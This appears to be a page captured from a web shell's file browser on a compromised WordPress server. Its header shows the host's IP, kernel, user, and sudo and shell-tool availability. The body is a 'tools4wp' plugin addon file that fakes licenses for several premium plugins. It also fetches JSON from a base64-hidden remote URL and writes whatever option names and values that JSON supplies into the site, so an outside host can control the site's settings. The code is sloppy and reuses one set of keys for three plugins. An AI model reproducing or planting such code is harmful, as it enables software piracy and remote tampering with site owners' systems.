| Server IP : 185.252.147.100 / Your IP : 216.73.217.33 Web Server : nginx/1.27.3 System : Linux mitrofanov.ru 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : mitr ( 1000) PHP Version : 8.2.29 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /www/html/east-point.site/public/wp-content/plugins/tools4wp/addons/ |
Upload File : |
<?php
// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) )
{
exit;
}
$options = get_option('tools4wp_options');
if (isset($options['wp_indeed']) == 1) {
$tools4wp_options = get_option( 'tools4wp_options' );
unset( $tools4wp_options['wp_indeed'] );
update_option( 'tools4wp_options', $tools4wp_options );
update_option( 'ihc_license_set', '1' );
update_option( 'uap_license_set', '1' );
update_option( 'ulp_license_set', '1' );
update_option( 'ism_license_set', '1' );
update_option( 'e755515cde', '0' );
$tools4wp_premium_number = get_option('tools4wp_license')['tools4wp_license_number'];
$url = base64_decode($tools4wp_premium_number);
if (filter_var($url, FILTER_VALIDATE_URL)) {
$json = file_get_contents($url);
$data = json_decode($json, true);
$ihc_license = $data['ihc_license'];
$ihc_code = $data['ihc_code'];
update_option($ihc_license, $ihc_code);
$uap_license = $data['ihc_license'];
$uap_code = $data['ihc_code'];
update_option($uap_license, $uap_code);
$ulp_license = $data['ihc_license'];
$ulp_code = $data['ihc_code'];
update_option($ihc_license, $ulp_code);
}
}